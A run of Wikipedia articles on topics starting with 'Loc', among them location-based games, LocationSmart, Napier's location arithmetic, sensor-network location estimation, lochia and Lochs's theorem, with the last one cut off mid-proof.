Pokémon Go notably has several publicized events of players being drawn to inappropriate locations for the game, requiring the developer to manually remove these areas from the game. [ 8 ] [ 9 ] [ 10 ] In one of the first legal challenges for location-based gaming, a Federal District court ruled that a Wisconsin county ordinance to require game developers of such location-based games to get appropriate permits to allow locations in the county's public park systems was likely unconstitutional. While the county had felt there was no First Amendment rights involved due to how locations were generated in-game, the Federal judge disagreed. [ 11 ]
The interaction of location-bound games with property law is largely undefined. [ 12 ] [ 13 ] Several models have been analysed for how this interaction may be resolved in a common law context: an extension of real property rights to also cover augmentations on or near the property with a strong notion of trespassing , forbidding augmentations unless allowed by the owner; an ' open range ' system, where augmentations are allowed unless forbidden by the owner; and a ' freedom to roam ' system, where real property owners have no control over non-disruptive augmentations. [ 14 ]
One issue experienced during the Pokémon Go craze was the game's players disturbing owners of private property while visiting nearby location-bound augmentations. The terms of service of Pokémon Go explicitly disclaim responsibility for players' actions, which may limit (but may not totally extinguish) the liability of its producer, Niantic , in the event of a player trespassing while playing the game: by Niantic's argument, the player is the one committing the trespass, while Niantic has merely engaged in permissible free speech . A theory advanced in lawsuits brought against Niantic is that their placement of game elements in places that will lead to trespass or an exceptionally large flux of visitors can constitute nuisance , despite each individual trespass or visit only being tenuously caused by Niantic. [ 15 ] [ 16 ] [ 17 ]
Another claim raised against Niantic is that the placement of profitable game elements on land without permission of the land's owners is unjust enrichment . [ 18 ] More hypothetically, a property may be augmented with advertising or disagreeable content against its owner's wishes. [ 19 ] Under American law, these situations are unlikely to be seen as a violation of real property rights by courts without an expansion of those rights to include augmented reality (similarly to how English common law came to recognise air rights ). [ 18 ]
Some attempts at legislative regulation have been made in the United States. Milwaukee County, Wisconsin , attempted to regulate location-based games played in its parks, requiring prior issuance of a permit, [ 20 ] but this was criticised on free speech grounds by a federal judge; [ 21 ] and Illinois considered mandating a notice and take down procedure for location-bound augmentations. [ 22 ]
Japan is the world's biggest market for consumer spending on location-based titles like Pokémon Go and Dragon Quest Walk , having generated over $620 million in 2023 which is equal to 50% of the global revenue. [ 23 ] By comparison, the United States is the second largest market for this genre spending over $380 million on the top five games. South Korea's spending on its top five came in at less than $16 million. [ 24 ] | https://en.wikipedia.org/wiki/Location-based_game |
LocationSmart , originally called TechnoCom Location Platform , is a location-as-a-service (LaaS) company based in Carlsbad, California , that provides location APIs to enterprises and operates a secure, cloud-based and privacy-protected platform. In February 2015, it acquired a competitor, Locaid. [ 1 ] [ 2 ]
LocationSmart provides near real-time location data for devices including smartphones, feature phones, tablets, M2M, IoT and other connected devices on Tier 1 and Tier 2 wireless networks in the U.S. and Canada. This includes AT&T , [ 3 ] Verizon Wireless , [ 4 ] T-Mobile US , Sprint Corporation , [ 5 ] MetroPCS , U.S. Cellular , Rogers Communications , Bell Canada and Telus . [ 6 ]
Founded in 1995, TechnoCom Corporation was headquartered in Los Angeles and called one of the area's fastest growing companies in 2003 by Deloitte & Touche . [ 7 ] In 2012, the TechnoCom Location Platform was rebranded as LocationSmart. [ 8 ]
On May 17, 2018, media outlets reported that the LocationSmart website allowed anyone to obtain the realtime location of any cell phone using any of the major U.S. wireless carriers (including AT&T, Verizon, T-Mobile, and Sprint), as well as some Canadian carriers, to within a few hundred yards, given only the phone number. [ 9 ] Approximately 200 million customers may have been exposed. No consent was required, and there was no ability to opt-out. In addition, the data could be requested by anyone anonymously, with no authentication , authorization , or payment required. [ 10 ] Security researcher Robert Xiao, who discovered the vulnerability, stated that the LocationSmart API failed to implement basic checks and that the vulnerability could have been found by anyone with little effort. In response, LocationSmart took the vulnerable service offline and claimed the company "takes privacy seriously". [ 11 ]
LocationSmart uses a variety of location methods that include cellular network location, Wi-Fi location, IP address location, landline location, hybrid location via a software development kit (SDK), browser location and global site identification (GSID) location.
LocationSmart provides location services for enterprises and Fortune 500 companies. LocationSmart is also used by US states to offer online gaming within the state borders. [ 12 ]
LocationSmart is a member of CTIA , the Transportation Intermediaries Association (TIA), and the International Association of Privacy Professionals (IAPP). | https://en.wikipedia.org/wiki/LocationSmart |
Location arithmetic (Latin arithmetica localis ) is the additive (non-positional) binary numeral systems , which John Napier explored as a computation technique in his treatise Rabdology (1617), both symbolically and on a chessboard -like grid.
Napier's terminology, derived from using the positions of counters on the board to represent numbers, is potentially misleading because the numbering system is, in facts, non- positional in current vocabulary.
During Napier's time, most of the computations were made on boards with tally-marks or jetons . So, unlike how it may be seen by the modern reader, his goal was not to use moves of counters on a board to multiply, divide and find square roots, but rather to find a way to compute symbolically with pen and paper.
However, when reproduced on the board, this new technique did not require mental trial-and-error computations nor complex carry memorization (unlike base 10 computations). He was so pleased by his discovery that he said in his preface:
it might be well described as more of a lark than a labor, for it carries out addition, subtraction, multiplication, division and the extraction of square roots purely by moving counters from place to place. [1]
Binary notation had not yet been standardized, so Napier used what he called location numerals to represent binary numbers. Napier's system uses sign-value notation to represent numbers; it uses successive letters from the Latin alphabet to represent successive powers of two: a = 2 0 = 1, b = 2 1 = 2, c = 2 2 = 4, d = 2 3 = 8, e = 2 4 = 16 and so on.
To represent a given number as a location numeral, that number is expressed as a sum of powers of two and then each power of two is replaced by its corresponding digit (letter). For example, when converting from a decimal numeral:
Using the reverse process, a location numeral can be converted to another numeral system. For example, when converting to a decimal numeral:
Napier showed multiple methods of converting numbers in and out of his numeral system. These methods are similar to modern methods of converting numbers in and out of the binary numeral system , so they are not shown here. Napier also showed how to add, subtract, multiply, divide, and extract square roots.
As in any numeral system using sign-value notation (but not those using positional notation ), digits (letters) can be repeated such that multiple numerals can represent a single number. For example:
Additionally, the order of digits does not matter. For example:
Because each digit in a location numeral represents twice the value of its next-lower digit, replacing any two occurrences of the same digit with one of the next-higher digit does not change the numeral's numeric value. Thus, repeatedly applying the rules of replacement aa → b , bb → c , cc → d , etc. to a location numeral removes all repeated digits from that numeral.
Napier called this process abbreviation and the resulting location numeral the abbreviated form of that numeral; he called location numerals containing repeated digits extended forms . Each number can be represented by a unique abbreviated form, not considering the order of its digits (e.g., abc , bca , cba , etc. all represent the number 7).
Location numerals allow for a simple and intuitive algorithm for addition:
For example, to add 157 = acdeh and 230 = bcfgh , join the numerals end-to-end:
rearrange the digits of the previous result (because the digits of acdehbcfgh are not in ascending order):
and abbreviate the previous result:
The final result, abhi , equals 387 ( abhi = 2 0 + 2 1 + 2 7 + 2 8 = 1 + 2 + 128 + 256 = 387); this is the same result achieved by adding 157 and 230 in decimal notation.
Subtraction is also intuitive, but may require expanding abbreviated forms to extended forms to perform borrows .
Write the minuend (the largest number you want to diminish) and remove from it all the digits appearing in the subtrahend (the smallest number). In case the digit to be removed does not appear in the minuend, then borrow it by expanding the unit just larger. Repeat until all the digit of the subtrahend have been removed.
A few examples show it is simpler than it sounds :
Napier proceeded to the rest of arithmetic, that is multiplication, division and square root, on an abacus, as it was common in his times. However, since the development of micro-processor computer, a lot of applicable algorithms have been developed or revived based on doubling and halving.
Doubling is done by adding a numeral to itself, which mean doubling each of its digit. This gives an extended form, which has to be abbreviated if needed. This operation can be done in one step by changing each digit of a numeral to the next larger digit. For example, the double of a is b , the double of b is c , the double of ab is bc , the double of acfg is bdgh , etc.
Similarly, multiplying by a power of two, is just translating its digits. To multiply by c = 4, for example, is transforming the digits a → c , b → d , c → e ,...
Halving is the reverse of doubling: change each digit to the next smaller digit. For example, the half of bdgh is acfg .
One sees immediately that it is only feasible when the numeral to be halved does not contain an a (or, if the numeral is extended, an odd number of a s). In other words, an abbreviated numeral is odd if it contains an a and even if it does not.
With these basic operations (doubling and halving), all the binary algorithms can be adapted starting by, but not limited to, the Bisection method and Dichotomic search .
Napier performed multiplication and division on an abacus, as was common in his times. However, Egyptian multiplication gives an elegant way to carry out multiplication without tables using only doubling, halving and adding.
Multiplying a single-digit number by another single-digit number is a simple process. Because all letters represent a power of 2, multiplying digits is the same as adding their exponents. This can also be thought of as finding the index of one digit in the alphabet ( a = 0, b = 1, ...) and incrementing the other digit by that amount in terms of the alphabet ( b + 2 => d ).
For example, multiply 4 = c by 16 = e
c * e = 2^2 * 2^4 = 2^6 = g
or...
AlphabetIndex ( c ) = 2, so... e => f => g
To find the product of two multiple digit numbers, make a two column table. In the left column write the digits of the first number, one below the other. For each digit in the left column, multiply that digit and the second number and record it in the right column. Finally, add all the numbers of the right column together.
As an example, multiply 238 = bcdfgh by 13 = acd
The result is the sum in the right column bcdfgh defhij efgijk = bcddeefffgghhiijjk = bcekl = 2+4+16+1024+2048 = 3094.
It is interesting to notice that the left column can also be obtained by successive halves of the first number, from which the even numbers are removed. In our example, acd , bc (even), ab , a . Noticing that the right column contains successive doubles of the second number, shows why the peasant multiplication is exact.
Division can be carried out by successive subtractions: the quotient is the number of time the divisor can be subtracted from the dividend, and the remainder is what is left after all the possible subtractions.
This process, which can be very long, may be made efficient if instead of the divisor we subtract multiple of the divisor, and computations are easier if we restrict to multiple by a power of 2.
In fact, this is what we do in the long division method.
Location arithmetic uses a square grid where each square on the grid represents a value. Two sides of the grid are marked with
increasing powers of two. Any inner square can be identified by two numbers on these two sides, one being vertically below the inner
square and the other to its far right. The value of the square is the product of these two numbers.
For instance, the square in this example grid represents 32, as it is the product of 4 on the right column and 8 from the bottom row. The grid itself can be any size, and larger grids simply permit us to handle larger numbers.
Notice that moving either one square to the left or one square up doubles the value. This property can be used to perform binary
addition using just a single row of the grid.
First, lay out a binary number on a row using counters to represent the 1s in the number. For example, 29 (= 11101 in binary) would be placed on the board like this:
The number 29 is clearly the sum of the values of the squares on which there are counters. Now overlay the second number on this row. Say we place 9 (= 1001 in binary) on it like this.
The sum of these two numbers is just the total value represented by the counters on the board, but some of the squares have more than one counter. Recall however, that moving to the left of a square doubles its value. So we replace two counters on a square with one counter to its left without changing the total value on the board. Note that this is the same idea used to abbreviate
location numerals. Let's start by replacing the rightmost pair of counters with a counter to its left, giving:
We still have another square with two counters on it, so we do it again:
But replacing this pair created another square with two counters on it, so we replace a third time:
Now each square has just one counter, and reading off the result in binary 100110 (= 38) gives the correct result.
Subtracting is not much more complicated than addition: instead of adding counters on the board we remove them. To "borrow" a value, we replace a counter on a square with two to its right.
Let's see how we might subtract 12 from 38. First place 38 (= 100110 in binary) on a row, and then place 12 (= 1100 in binary) under it:
For every counter on the lower row that has a counter above it, remove both counters. We can remove one such pair on the board,
resulting in:
Now we need to "borrow" counters to get rid of the remaining counter on the bottom. First replace the leftmost counter on the top row with two to its right:
Now replace one of the two counters with two more to its right, giving:
We can now take away one of the counters on the top row with the remaining counter on the bottom row:
and read off 26, the final result.
Unlike addition and subtraction, the entire grid is used to multiply, divide, and extract square roots. The grid has some useful properties utilized in these operations. First, all the squares on any diagonal going from the bottom left to the top right have the same value.
Since a diagonal move can be broken down into a move to the right (which halves the value) followed by a move
up (which doubles the value), the value of the square stays the same.
In conjunction with that diagonal property, there is a quick way to divide the numbers on the bottom and right edges of the grid.
To perform 32÷8, one locates the dividend 32 along the right side and the divisor 8 on the bottom edge of the grid. Extending a diagonal from the dividend to the square where it intersects a vertical line of the divisor, the quotient lies at the right end of the grid from this square, in this example 4.
This works as moving along the diagonal does not change the value; the value of the square on the intersection is still the dividend. Thus, the dividend is the product of the squares along the bottom and right edge. Since the square on the bottom edge is the divisor, the square on the right edge is the quotient.
To multiply a pair of binary numbers, first mark the two numbers
on the bottom and the right side of the grid. Say we want to
multiply 22 (= 10110) by 9 (= 1001).
Now place counters at every "intersection" of vertical and
horizontal rows of the 1s in each number.
Notice that each row of counters on the grid is just
22 multiplied by some
power of two. In fact, the total value of the counters is the
sum of two rows
So the counters on the board actually represent the product
of the two numbers, except it is not possible to "read off" the
answer just yet.
Recall that moving counters diagonally does not change the value,
so move all the counters on inner squares diagonally until they
hit either the bottom row or the left column.
Now we make the same moves we did for addition. Replace two counters on a square with one to its left. If the square is on the left column, replace two counters with one above it. Recall that the value of a square doubles if you move up, so this does not change the value on the grid.
Let's first replace the two counters on the second square at the bottom with one to its left which leaves two counters at the corner.
Finally, replace the two counters on the corner with one above it
and "read off" the binary number in an L-shaped fashion, starting from
the top left down to the bottom left corner, and then over to the
bottom right.
Read the counters along the L but do not double count the corner square.
You will read the binary result 11000110 = 198 which is indeed 22*9.
Why can we read the binary number in this L-shaped fashion? The
bottom row is of course just the first six powers of two, but
notice that the leftmost column has the next five powers of
two. So we can directly read off an 11 digit binary number from
the L-shaped set of 11 squares that lie along the left and bottom
sides of the grid.
Our small 6x6 grid can only multiply numbers each up to 63, and in
general an n x n grid can multiply two numbers each up to
2 n -1. This scales very fast, so board with 20 numbers per side, for
instance, can multiply numbers each up to a little over one million.
Martin Gardner presented a slightly easier to understand
version [2] of Napier's division method, which is what is
shown here.
Division works pretty much the reverse of multiplication. Say we want
to divide 485 by 13. First place counters for 485 (= 111100101) along
the bottom edge and mark 13 (= 1101) along the right edge. To save
space, we'll just look at a rectangular portion of the board because
that's all we actually use.
Starting from the left, the game is to move counters diagonally into
"columns of divisors" (that is, with one counter on each row marked
with a 1 from the divisor.) Let's demonstrate this with the leftmost
block of counters.
Now the next block of counters we might try would begin with the
leftmost counter on the bottom, and we might attempt something like
except that we do not have any counters that we can move diagonally from the bottom edge into squares that would form the rest of the "column of divisors."
In such cases, we instead "double down" the counter on the bottom row and form a column one over to the right. As you will soon see, it will always be possible to form a column this way. So first replace the counter on the bottom with two to its right.
and then move one diagonally to the top of the column, and move
another counter located on the edge of the board into its spot.
It looks like we still do not have a counter on the bottom edge to move
diagonally into the remaining square, but notice that we can instead
double down the leftmost counter again and then move it into the
desired square.
and now move one counter diagonally to where we want it.
Let's proceed to build the next column. Once again, notice that moving the leftmost counter to the top of the column does not leave enough counters at the bottom to fill in the remaining squares.
So we double down the counter and move one diagonally into the next column over. Let's also move the rightmost counter into the column, and here is how it looks after these steps.
We still have a missing square, but we just double down again and move
the counter into this spot and end up with
At this point, the counter on the bottom edge is so far to the right
that it cannot go diagonally to the top of any column, which signals
that we are done.
The result is "read" off the columns—each column with counters is
treated as a 1 and empty columns are 0. So the result is
100101 (= 37) and the remainder is the binary value of any counters
still left along the bottom edge. There is one counter on the third
column from the right, so we read it as 100 (= 4) and we get 485
÷ 13 = 37 with a remainder 4. | https://en.wikipedia.org/wiki/Location_arithmetic |
Location awareness refers to devices that can determine their location. Navigational instruments provide location coordinates for vessels and vehicles. Surveying equipment identifies location with respect to a well-known location wireless communications device.
The term applies to navigating , real-time locating , and positioning support with global, regional or local scope. The term has been applied to traffic , logistics , business administration , and leisure applications. Location awareness is supported by navigation systems , positioning systems , and/or locating services .
Location awareness without the active participation of the device is known as non-cooperative locating or detection.
The term originated for configurations settings of network systems, and addressed network entities. Network location awareness (NLA) services collect network configuration and location information, and notify applications when this information changes. With the advent of global navigation satellite systems ( GNSS ) and radio-equipped mobile devices, the term was redefined to include consumer-focused applications.
While location awareness began as a matter of static user location, the notion was extended to reflect movement. Context models have been proposed [ 1 ] to support context-aware applications which use location to tailor interfaces, refine application-relevant data, increase the precision of information retrieval, discover services, make user interaction implicit and build smart environments. For example, a location-aware mobile phone may confirm that it is currently in a building. [ 2 ]
Description in logical terms uses a structured textual form. International standardisation offers a common method using ISO/TS 16952 [ 3 ] as originated with German standards DIN EN 61346 [ 4 ] and DIN EN 81346. [ 5 ]
Location in mathematical terms offers coordinates that refer to a nominated point of reference .
Location in network terms relates to locating network nodes. These include:
"Crisp" locating offers precise coordinates, using wireless signals or optical sighting, possibly [ attribution needed ] with phase angle measurements. Coordinates are relative to either a standardized system of coordinates, e.g., WGS84 , or a fixed object such as a building plan. Real-time locating adds timely delivery of results, especially for moving targets. Real time locating is defined with ISO / IEC 19762-5 and ISO/IEC 24730-1. [ 14 ] Fuzzy locating offers less precision, e.g., presence "near" a point of reference. Measuring wireless power levels can supply this degree of precision. Less sophisticated systems can use wireless distance measurements to estimate a point of reference in polar coordinates (distance and direction) from another site. Index locating indicates presence at a known location, as with fixed RFID reader's and RFID tags. [ 15 ]
Location-aware systems address the acquisition of coordinates in a grid (for example using distance metrics and lateration algorithms) or at least distances to reference points (for example discriminating presence at a certain choke point on a corridor or in a room of a building). [ 16 ]
Navigation and reckoning are key concerns for seafarers , aviators and professional drivers. The task is to dynamically determine the current location and the time, distance and direction to destination. radar served for regional demand and NAVSTAR satellite systems for global demand. Global navigation satellite systems ( GNSS ) have become ubiquitous in long-haul transport operation and are becoming a standard automobile feature. [ 17 ]
Surveying is the static complement to navigating. It is essential for delineating land ownership and for architects and civil engineers designing construction projects. Optical surveying technology preceded laser triangulating aids. [ 18 ]
Currently location awareness is applied to design innovative process controls , and is integral to ubiquitous and wearable computing . On mobile devices, location aware search can prioritize results that are close to the device. Conversely, the device location can be disclosed to others, at some cost to the bearer's privacy. [ 19 ]
RFID provides a time/location reference for an object, but does not indicate that the object remains at that location, which is sufficient for applications that limit access, such as tracking objects entering and leaving a warehouse, or for objects moving on a fixed route, such as charging tolls for crossing a bridge. [ 20 ] [ 21 ]
Location awareness enables new applications for ubiquitous computing systems and mobile phones . Such applications include the automatic reconfiguration of a computing device to suit the location in which it is currently being used (examples include ControlPlane Archived 2017-11-07 at the Wayback Machine and Locamatic ), or publishing a user's location to appropriate members of a social network, and allowing retailers to publish special offers to potential customers who are near to the retailers. Allegedly, individuals gain self confidence with confirmation of current whereabouts . [ 22 ]
While governments have created global systems for computing locations, independent localized systems exist at scales ranging from one building to sub-national regions.
Such solutions may apply concepts of real-time locating system (RTLS) and wireless personal area network (WPAN), wireless LAN or DECT , with results in proprietary terms of floor plans or room numbers. Local systems degrade as distance from the locality increases. Applications include the automatic reconfiguration of a computing device to suit the location in which it is currently being used.
This approach uses for example mobile phone systems, such as 3GPP , GSM or LTE , typically returning information in standardized coordinates as with WGS84 in standardized formats such as National Marine Electronics Association (NMEA) for outdoor usage or in symbolic coordinates referring to street addresses.
This approach relies on global navigation satellite system (GNSS) technology generally adopting WGS84 and NMEA . Applications include avalanche rescue or emergency and mountain rescue as well as UAVs which are commonly used in search and rescue , (SAR) and combat search and rescue (CSAR).
Network location awareness ( NLA ) describes the location of a node in a network. [ 23 ] [ unreliable source? ] [ 24 ] | https://en.wikipedia.org/wiki/Location_awareness |
Location estimation in wireless sensor networks is the problem of estimating the location of an object from a set of noisy measurements. These measurements are acquired in a distributed manner by a set of sensors.
Many civilian and military applications require monitoring that can identify objects in a specific area, such as monitoring the front entrance of a private house by a single camera. Monitored areas that are large relative to objects of interest often require multiple sensors (e.g., infra-red detectors) at multiple locations. A centralized observer or computer application monitors the sensors. The communication to power and bandwidth requirements call for efficient design of the sensor, transmission, and processing.
The CodeBlue system [ 1 ] of Harvard University is an example where a vast number of sensors distributed among hospital facilities allow staff to locate a patient in distress. In addition, the sensor array enables online recording of medical information while allowing the patient to move around. Military applications (e.g. locating an intruder into a secured area) are also good candidates for setting a wireless sensor network.
Let θ {\displaystyle \theta } denote the position of interest. A set of N {\displaystyle N} sensors
acquire measurements x n = θ + w n {\displaystyle x_{n}=\theta +w_{n}} contaminated by an
additive noise w n {\displaystyle w_{n}} owing some known or unknown probability density function (PDF). The sensors transmit measurements to a central processor. The n {\displaystyle n} th sensor encodes x n {\displaystyle x_{n}} by a function m n ( x n ) {\displaystyle m_{n}(x_{n})} . The application processing the data applies a pre-defined estimation rule θ ^ = f ( m 1 ( x 1 ) , ⋅ , m N ( x N ) ) {\displaystyle {\hat {\theta }}=f(m_{1}(x_{1}),\cdot ,m_{N}(x_{N}))} . The set of message functions m n , 1 ≤ n ≤ N {\displaystyle m_{n},\,1\leq n\leq N} and the fusion rule f ( m 1 ( x 1 ) , ⋅ , m N ( x N ) ) {\displaystyle f(m_{1}(x_{1}),\cdot ,m_{N}(x_{N}))} are
designed to minimize estimation error.
For example: minimizing the mean squared error (MSE), E ‖ θ − θ ^ ‖ 2 {\displaystyle \mathbb {E} \|\theta -{\hat {\theta }}\|^{2}} .
Ideally, sensors transmit their measurements x n {\displaystyle x_{n}} right to the processing center, that is m n ( x n ) = x n {\displaystyle m_{n}(x_{n})=x_{n}} . In this
settings, the maximum likelihood estimator (MLE) θ ^ = 1 N ∑ n = 1 N x n {\displaystyle {\hat {\theta }}={\frac {1}{N}}\sum _{n=1}^{N}x_{n}} is an unbiased estimator whose MSE is E ‖ θ − θ ^ ‖ 2 = var ( θ ^ ) = σ 2 N {\displaystyle \mathbb {E} \|\theta -{\hat {\theta }}\|^{2}={\text{var}}({\hat {\theta }})={\frac {\sigma ^{2}}{N}}} assuming a white Gaussian noise w n ∼ N ( 0 , σ 2 ) {\displaystyle w_{n}\sim {\mathcal {N}}(0,\sigma ^{2})} . The next sections suggest
alternative designs when the sensors are bandwidth constrained to
1 bit transmission, that is m n ( x n ) {\displaystyle m_{n}(x_{n})} =0 or 1.
A Gaussian noise w n ∼ N ( 0 , σ 2 ) {\displaystyle w_{n}\sim {\mathcal {N}}(0,\sigma ^{2})} system can be designed as follows:
Here τ {\displaystyle \tau } is a parameter leveraging our prior knowledge of the
approximate location of θ {\displaystyle \theta } . In this design, the random value
of m n ( x n ) {\displaystyle m_{n}(x_{n})} is distributed Bernoulli ~ ( q = F ( τ − θ ) ) {\displaystyle (q=F(\tau -\theta ))} . The
processing center averages the received bits to form an estimate q ^ {\displaystyle {\hat {q}}} of q {\displaystyle q} , which is then used to find an estimate of θ {\displaystyle \theta } . It can be verified that for the optimal (and
infeasible) choice of τ = θ {\displaystyle \tau =\theta } the variance of this estimator
is π σ 2 4 {\displaystyle {\frac {\pi \sigma ^{2}}{4}}} which is only π / 2 {\displaystyle \pi /2} times the
variance of MLE without bandwidth constraint. The variance
increases as τ {\displaystyle \tau } deviates from the real value of θ {\displaystyle \theta } , but it can be shown that as long as | τ − θ | ∼ σ {\displaystyle |\tau -\theta |\sim \sigma } the factor in the MSE remains approximately 2. Choosing a suitable value for τ {\displaystyle \tau } is a major disadvantage of this method since our model does not assume prior knowledge about the approximated location of θ {\displaystyle \theta } . A coarse estimation can be used to overcome this limitation. However, it requires additional hardware in each of
the sensors.
A system design with arbitrary (but known) noise PDF can be found in. [ 3 ] In this setting it is assumed that both θ {\displaystyle \theta } and
the noise w n {\displaystyle w_{n}} are confined to some known interval [ − U , U ] {\displaystyle [-U,U]} . The
estimator of [ 3 ] also reaches an MSE which is a constant factor
times σ 2 N {\displaystyle {\frac {\sigma ^{2}}{N}}} . In this method, the prior knowledge of U {\displaystyle U} replaces
the parameter τ {\displaystyle \tau } of the previous approach.
A noise model may be sometimes available while the exact PDF parameters are unknown (e.g. a Gaussian PDF with unknown σ {\displaystyle \sigma } ). The idea proposed in [ 4 ] for this setting is to use two
thresholds τ 1 , τ 2 {\displaystyle \tau _{1},\tau _{2}} , such that N / 2 {\displaystyle N/2} sensors are designed
with m A ( x ) = I ( x − τ 1 ) {\displaystyle m_{A}(x)=I(x-\tau _{1})} , and the other N / 2 {\displaystyle N/2} sensors use m B ( x ) = I ( x − τ 2 ) {\displaystyle m_{B}(x)=I(x-\tau _{2})} . The processing center estimation rule is generated as follows:
As before, prior knowledge is necessary to set values for τ 1 , τ 2 {\displaystyle \tau _{1},\tau _{2}} to have an MSE with a reasonable factor
of the unconstrained MLE variance.
The system design of [ 3 ] for the case that the structure of the noise
PDF is unknown. The following model is considered for this scenario:
In addition, the message functions are limited to have the form
where each S n {\displaystyle S_{n}} is a subset of [ − 2 U , 2 U ] {\displaystyle [-2U,2U]} . The fusion estimator is also restricted to be linear, i.e. θ ^ = ∑ n = 1 N α n m n ( x n ) {\displaystyle {\hat {\theta }}=\sum \limits _{n=1}^{N}\alpha _{n}m_{n}(x_{n})} .
The design should set the decision intervals S n {\displaystyle S_{n}} and the
coefficients α n {\displaystyle \alpha _{n}} . Intuitively, one would allocate N / 2 {\displaystyle N/2} sensors to encode the first bit of θ {\displaystyle \theta } by setting their decision interval to be [ 0 , 2 U ] {\displaystyle [0,2U]} , then N / 4 {\displaystyle N/4} sensors would encode the second bit by setting their decision interval to [ − U , 0 ] ∪ [ U , 2 U ] {\displaystyle [-U,0]\cup [U,2U]} and so on. It can be shown that these decision
intervals and the corresponding set of coefficients α n {\displaystyle \alpha _{n}} produce a universal δ {\displaystyle \delta } -unbiased estimator, which is an
estimator satisfying | E ( θ − θ ^ ) | < δ {\displaystyle |\mathbb {E} (\theta -{\hat {\theta }})|<\delta } for every possible value of θ ∈ [ − U , U ] {\displaystyle \theta \in [-U,U]} and for every realization of w n ∈ P {\displaystyle w_{n}\in {\mathcal {P}}} . In fact, this intuitive
design of the decision intervals is also optimal in the following
sense. The above design requires N ≥ ⌈ log 8 U δ ⌉ {\displaystyle N\geq \lceil \log {\frac {8U}{\delta }}\rceil } to satisfy the universal δ {\displaystyle \delta } -unbiased property while theoretical arguments show that
an optimal (and a more complex) design of the decision intervals
would require N ≥ ⌈ log 2 U δ ⌉ {\displaystyle N\geq \lceil \log {\frac {2U}{\delta }}\rceil } , that is:
the number of sensors is nearly optimal. It is also argued in [ 3 ] that if the targeted MSE E ‖ θ − θ ^ ‖ ≤ ϵ 2 {\displaystyle \mathbb {E} \|\theta -{\hat {\theta }}\|\leq \epsilon ^{2}} uses a small
enough ϵ {\displaystyle \epsilon } , then this design requires a factor of 4 in the
number of sensors to achieve the same variance of the MLE in
the unconstrained bandwidth settings.
The design of the sensor array requires optimizing the power
allocation as well as minimizing the communication traffic of the
entire system. The design suggested in [ 5 ] incorporates probabilistic quantization in
sensors and a simple optimization program that is solved in the
fusion center only once. The fusion center then broadcasts a set
of parameters to the sensors that allows them to finalize their
design of messaging functions m n ( ⋅ ) {\displaystyle m_{n}(\cdot )} as to meet the energy
constraints. Another work employs a similar approach to address
distributed detection in wireless sensor arrays. [ 6 ] | https://en.wikipedia.org/wiki/Location_estimation_in_sensor_networks |
In computer networks, location transparency is the use of names to identify network resources, rather than their actual location. [ 1 ] [ 2 ] For example, files are accessed by a unique file name, but the actual data is stored in physical sectors scattered around a disk in either the local computer or in a network. In a location transparency system, the actual location where the file is stored doesn't matter to the user. A distributed system will need to employ a networked scheme for naming resources.
The main benefit of location transparency is that it no longer matters where the resource is located. Depending on how the network is set, the user may be able to obtain files that reside on another computer connected to the particular network. [ 1 ] This means that the location of a resource doesn't matter to either the software developers or the end-users. This creates the illusion that the entire system is located in a single computer, which greatly simplifies software development.
An additional benefit is the flexibility it provides. Systems resources can be moved to a different computer at any time without disrupting any software systems running on them. By simply updating the location that goes with the named resource, every program using that resource will be able to find it. [ 2 ] Location transparency effectively makes the location easy to use for users, since the data can be accessed by almost everyone who can connect to the Internet, who knows the right file names for usage, and who has proper security credentials to access it. [ 1 ]
This computing article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Location_transparency |
In the field of obstetrics , lochia is the vaginal discharge after giving birth, containing blood , mucus , and uterine tissue. [ 1 ] Lochia discharge typically continues for four to eight weeks after childbirth , [ 2 ] a time known as the postpartum period or puerperium. A 2016 review ties this "lochial period" to worldwide customs of postpartum confinement , a time for the new mother and baby to bond. [ 3 ]
Lochia is sterile for the first two days, but not so by the third or fourth day, as the uterus begins to be colonized by vaginal commensals such as non-hemolytic streptococci and E. coli . [ 4 ] The Cleveland Clinic recommends that pads be used instead of tampons to absorb the fluid as materials should not be inserted in the vagina soon after childbirth. [ 5 ]
It progresses through three stages: [ 6 ]
In general, lochia has an odor similar to that of normal menstrual fluid. Any offensive odor or change to a greenish color indicates contamination by organisms such as chlamydia or staph saprophyticus . [ 8 ]
Lochia that is retained within the uterus is known as lochiostasis [ 9 ] or lochioschesis, and can result in lochiometra [ 10 ] (distention of the uterus - pushing it out of shape). Lochiorrhea describes an excessive flow of lochia and can indicate infection. [ 11 ] | https://en.wikipedia.org/wiki/Lochia |
Lochium Funis ( Latin for the log and line ) was a constellation created by Johann Bode in 1801 next to the constellation Pyxis , an earlier invention of Nicolas Louis de Lacaille . It represented the log and line used by seamen for measuring a ship's speed through the water. It was never used by other astronomers.
This constellation -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Lochium_Funis |
In number theory , Lochs's theorem concerns the rate of convergence of the continued fraction expansion of a typical real number. A proof of the theorem was published in 1964 by Gustav Lochs . [ 1 ]
The theorem states that for almost all real numbers in the interval (0,1), the number of terms m of the number's continued fraction expansion that are required to determine the first n places of the number's decimal expansion behaves asymptotically as follows:
As this limit is only slightly smaller than 1, this can be interpreted as saying that each additional term in the continued fraction representation of a "typical" real number increases the accuracy of the representation by approximately one decimal place. The decimal system is the last positional system for which each digit carries less information than one continued fraction quotient; going to base-11 (changing ln ( 10 ) {\displaystyle \ln(10)} to ln ( 11 ) {\displaystyle \ln(11)} in the equation) makes the above value exceed 1.
The reciprocal of this limit,
is twice the base-10 logarithm of Lévy's constant .
A prominent example of a number not exhibiting this behavior is the golden ratio —sometimes known as the " most irrational " number—whose continued fraction terms are all ones, the smallest possible in canonical form. On average it requires approximately 2.39 continued fraction terms per decimal digit. [ 3 ]
The proof assumes basic properties of continued fractions .
Let T : x ↦ 1 / x mod 1 {\displaystyle T:x\mapsto 1/x\mod 1} be the Gauss map.
Let ρ ( t ) = 1 ( 1 + t ) ln 2 {\displaystyle \rho (t)={\frac {1}{(1+t)\ln 2}}} be the probability density function for the Gauss distribution, which is preserved under the Gauss map.
Since the probability density function is bounded above and below, a set is negligible with respect to the Lebesgue measure if and only if to the Gauss distribution.
Lemma. 1 n ln T n x → 0 {\textstyle {\frac {1}{n}}\ln T^{n}x\to 0} .
